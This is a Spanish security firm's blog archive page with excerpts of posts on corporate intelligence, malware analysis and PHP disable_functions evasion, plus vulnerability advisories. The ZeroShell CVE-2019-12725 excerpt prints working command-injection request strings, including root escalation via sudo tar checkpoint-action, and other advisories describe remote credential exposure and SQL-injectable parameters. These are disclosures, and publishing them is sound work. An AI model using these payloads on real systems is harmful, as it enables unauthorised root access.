Acerca de Administrador

Este autor no presenta ningún detalle.
Hasta ahora Administrador ha creado 238 entradas de blog.

Unidades de Inteligencia Económica en empresas

Por |5 May. 2020|Blog de Ciberinteligencia|

Manipulado por (o en colaboración con) un actor hostil externo, un empleado está exfiltrando información crítica de la compañía con un alto impacto de pérdidas a largo plazo para el negocio. Por otro lado, y de forma planificada, un exempleado está difundiendo bajo seudónimo por RRSS y en MCS una combinación de informaciones falsas, tergiversadas, incompletas y tendenciosas en contra de su ex compañía, que están generando un alto daño reputacional para esa organización. Además, distintas unidades de negocio vienen solicitando una primera valoración o chequeo de fiabilidad a proveedores y socios, así como una valoración de solvencia de futuros clientes antes de decidirse a participar en diferentes licitaciones y concursos internacionales. Gestionar y resolver este tipo de problemas son ...

Más información
Comentarios desactivados en Unidades de Inteligencia Económica en empresas

Ragnarok Stopper: Desarrollo de una vacuna

Por |4 May. 2020|Blog de BlackArrow|

El campo de la ingeniería inversa, específicamente el análisis de malware, dentro del proceso de Respuesta a incidentes tiene especial relevancia. Más allá del análisis de registros, eventos, conexiones de red, alertas generadas por IDS y firewalls, etc., la experiencia nos dice que un análisis preliminar lo suficientemente temprano de un binario sospechoso (siempre y cuando sea posible) puede ofrecer inteligencia de alto valor no solo para obtener mayor contexto sobre un incidente (TTPs, C2, persistencia, timeline de los hechos, etc.,) sino para desarrollar herramientas o técnicas para mitigar una campaña aún en curso. El siguiente caso es un ejemplo de ello. En un incidente reciente, obtuvimos un binario empaquetado con Ragnarok, un malware ampliamente utilizado en los últimos meses ...

Más información
Comentarios desactivados en Ragnarok Stopper: Desarrollo de una vacuna

Amenazas híbridas contra empresas

Por |14 Abr. 2020|Blog de Ciberinteligencia|

Siempre han existido amenazas híbridas en el ámbito corporativo En los años transcurridos de este siglo XXI, las expresiones guerra híbrida y amenaza híbrida se han ido consolidando como denominaciones de fenómenos de importancia creciente, al tiempo que se han ido concretando las nociones aludidas bajo dichas designaciones. Del mismo modo, cada vez es mayor el esfuerzo que se dedica a entender y a estudiar los incidentes relacionados. La consolidación terminológica y conceptual se produjo originalmente en el ámbito militar y geopolítico a consecuencia de la aparición de nuevas formas de entender la guerra y de la introducción de cambios y evoluciones en las estrategias que desarrollan diferentes países, así como de los tipos de enfrentamiento existentes entre ellos. En ...

Más información
Comentarios desactivados en Amenazas híbridas contra empresas

Evasión de disable_functions y explotación local en PHP

Por |26 Mar. 2020|Blog de BlackArrow|

Dentro del marco de un test de intrusión, o una operación de Red Team, es común comprometer servidores web en los que se despliegan múltiples herramientas (webshells, proxysocks para tunelizar tráfico TCP en HTTP y pivotar, etc.) en forma de scripts. En algunos casos estos servidores pueden estar más o menos bastionados, dificultando en cierto grado poder comprometer los mismos. Una de las configuraciones más comunes que se puede encontrar en entornos PHP es el uso de disable_functions para restringir las funciones que pueden ser usadas en los scripts, de tal forma que se evita hacer uso de funciones "peligrosas" como system(), passthru(), etc. En este artículo analizaremos en profundidad cómo funciona esta directiva de PHP y cómo es posible ...

Más información
Comentarios desactivados en Evasión de disable_functions y explotación local en PHP

Tabletop – Ejercicios de simulación

Por |22 Nov. 2019|Blog de Ciberinteligencia|

Aerolíneas y fuerzas aéreas utilizan desde hace décadas el simulador como herramienta imprescindible para fortalecer la seguridad. Ejercicios como TableTop son de gran utilidad El trabajo con el simulador y los ejercicios como TableTop resultan claves en la navegación y para mejorar el nivel de adiestramiento y preparación de las tripulaciones de aerolíneas y fuerzas aéreas. Utilizando el simulador, estas tripulaciones se familiarizan con las normas y procedimientos de navegación y tráfico aéreo. Y entrenan además su capacidad de respuesta ante alertas y emergencias en condiciones de “estrés virtual”. Porque en un entorno de simulación se cuenta con la posibilidad de repetir para poder mejorar las respuestas a los ejercicios y escenarios que se planteen. A pesar de su creciente ...

Más información
Comentarios desactivados en Tabletop – Ejercicios de simulación

Vulnerabilidad en ZeroShell – CVE-2019-12725

Por |17 Jul. 2019|Blog de Tarlogic - Ciberseguridad|

Producto: ZeroShell Fecha de publicación: 17/07/2019 Autor: Juan Manuel Fernandez (@TheXC3LL) - Tarlogic Vulnerabilidad Zeroshell - CVE-2019-12725 Ejecución remota de código como root La última versión de ZeroShell linux router (3.9.0) es vulnerable a una ejecución remota de código porque varios parámetros de un script son utilizados sin una validación adecuada. Esta vulnerabilidad puede ser utilizada haciendo uso de caracteres de nueva línea: Ejemplo de parámetro vulnerable: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509view&User=Admin&x509type='%0Auname -a%0A' De forma adicional, el usuario Apache puede ejecutar el comando "tar" como root(/etc/sudoers): (...) apache ALL= NOPASSWD: /bin/tar (...) exploit de Zeroshell Esta vulnerabilidad en ZeroShell puede ser utilizada para elevar privilegios a través de la ejecución remota de código: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type='%0A/etc/sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=id%0A' uid=0(root) gid=0(root) groups=0(root) Una ...

Más información
Comentarios desactivados en Vulnerabilidad en ZeroShell – CVE-2019-12725

Vulnerabilidad en Ubiquoss Switch VP5208A – CVE-2018-10024

Por |1 Abr. 2018|Blog de Tarlogic - Ciberseguridad|

Fabricante: Ubiquoss Producto: Ubiquoss Switch VP5208A Descubierto por: Juan Manuel Fernandez - Tarlogic (@TheXC3LL) Vulnerabilidad Switch Ubiquoss VP5208A - CVE-2018-10024 Descubrimiento de credenciales. El Switch Ubiquoss VP5208A crea un fichero bcm_password en la carpeta /cgi-bin/ con las credenciales del usuario en texto claro cuando se produce un inicio de sesión incorrecto. Este fichero puede ser obtenido remotamente con un navegador. Las credenciales obtenidas pueden ser usadas remotamente accediendo al sistema a través de SSH (o a través de Telnet si está hablitado) Time Line ---------------------- 18/09/17 - Contacto con el fabricante. 06/03/18 - Contacto con el US-CERT con el reporte. 15/03/18 - Respuesta del US-CERT. Proporcionan otro email para intentar de nuevo el contacto. 15/03/18 - Intento de contactar nuevamente ...

Más información
Comentarios desactivados en Vulnerabilidad en Ubiquoss Switch VP5208A – CVE-2018-10024

Vulnerabilidad en Saifor CVMS Hub 1.3.1 – CVE-2018-6792

Por |1 Mar. 2018|Blog de Tarlogic - Ciberseguridad|

Tarlogic Advisory: Tarlogic-2018-001 Titulo: Injección SQL en Saifor CVMS Hub 1.3.1 Descubierto por: José Manuel Aparicio - Tarlogic (@jm_aparicio) Vulnerabilidad en Saifor CVMS CVE-2018-6792 Se han identificado múltiples inyecciones SQL en CVMS HUB 1.3.1 pemiten a un usuario no autorizado ejecutar código SQL arbitrario a través de múltiples parámetros en una petición POST contra el recurso /cvms-hub/privado/seccionesmib/secciones.xhtml. Los siguientes parámetros son vulnerables: formularioGestionarSecciones:tablaSeccionesMib:j_idt118:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt120:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt122:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt124:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt126:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt128:filter formularioGestionarSecciones:tablaSeccionesMib:j_idt130:filter También existe una inyección SQL en /cvms-hub/privado/seccionesmib/secciones.xhtml a través del parámetro GET 'nombreAgente'. Time Line ------------------- 21/12/2017 - Vulnerability reported to vendor (sin respuesta) 23/01/2018 - Vulnerability reported to vendor (sin respuesta) 06/02/2018 - Full disclosure after 45 days (https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm) Descubre nuestros trabajos y nuestros servicios de ciberseguridad.

Más información
Comentarios desactivados en Vulnerabilidad en Saifor CVMS Hub 1.3.1 – CVE-2018-6792

Utilizamos cookies para ofrecerte la mejor experiencia en nuestra web. Puedes aprender más sobre qué cookies utilizamos o desactivarlas en los Ajustes de cookies

Política de privacidad - Aviso legal

Necesary

Las cookies estrictamente necesarias tiene que activarse siempre para que podamos guardar tus preferencias de ajustes de cookies.

Cookies de terceros

Esta web utiliza Google Analytics para recopilar información anónima tal como el número de visitantes del sitio, o las páginas más populares. Dejar esta cookie activa nos permite mejorar nuestra web.

Política de cookies